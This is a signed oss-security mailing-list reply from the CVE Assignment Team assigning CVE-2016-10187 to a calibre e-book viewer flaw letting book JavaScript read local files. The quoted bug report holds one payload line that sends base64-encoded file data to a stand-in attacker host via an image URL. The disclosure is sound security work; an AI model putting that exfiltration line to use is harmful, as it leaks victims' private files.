Message-ID: <0cab773cce2c4a279f0667a388d3728c@imshyb01.MITRE.ORG>
Date: Tue, 31 Jan 2017 10:19:04 -0500
From: <cve-assign@...re.org>
To: <mpitt@...ian.org>
CC: <cve-assign@...re.org>, <oss-security@...ts.openwall.com>, <anarcat@...ian.org>
Subject: Re: Requesting CVE for calibre file disclosure

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

> Calibre 2.75 fixed what looks like a local data disclosure vulnerability:
>
> https://github.com/kovidgoyal/calibre/commit/3a89718664cb8cce0449d1758eee585ed0d0433c
>
> E-book viewer: Prevent javascript in the book from accessing files on the
> computer using XMLHttpRequest.

> https://bugs.launchpad.net/calibre/+bug/1651728

>> When the attacker changes document.write in the payload to this:
>> document.write('<img src="http://evildomain.pl/some.jpg?data=' + btoa(data) + '">');
>> they could easily read the data from the server log.

Use CVE-2016-10187.

- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJYkKkAAAoJEHb/MwWLVhi2VMIQAJR5qTlhg0haVZfpsRXpX8YG
O3JHHe2AW1NfvM8nYnxLK6MKfgBGIIh2oehQr9fG0wvKp0UF5Nmw8suFdiivfUFC
N5KorT7Yb8xVJJzZmksPQ0mna8KAjJj5tw+1tentldFR0qbBnMxT0FiswF0rh815
B5eVflvSH1gu3f9uEHpk3HSHZ0RagMwwA8XGe6h2AigShdQr6VCjP8SMafiu9pSA
mXB+uFRso6bs5moyspW66DsuixeBBgFXn8QjoNhBWLA0Hj+d4Sz6BC0uUXCtPjy6
6eWLZW2LOjiAlymGNgYuXXxDWslEBYe2LCnLntHKPff/JphuwwqdUz5dHHObktII
uOXYrT7/Fyw6GLUtU3OulmqPbi4hOxEC2ERTse4l1RH9L6GpbBKY7Usq6xM9f9gx
zYD+nQOVfR1aI/otMqsw0PaQSXyENId0Yv31+vwZTXk/TZ1dFBByaRCkjEAeTACR
uh++QTFQKe2z91g+57jAQvAeD9hx6pepr3gV1b0QYjXgsDW2as+FDtWrYUVlVqdf
NszEb+Z5sdVwEBFQVWqDudvZvUPnoaGgb7YrQxY85YSjoqrYk50iWArup2OMSxAb
tMiMJjWuUiU17BPL/ih3OAdEJceUuyVjkmT/rTcjLbGHrCRPT+OZHyqDohzaQKbx
k5XtJrNvWNusE+Q69k0e
=tz/j
-----END PGP SIGNATURE-----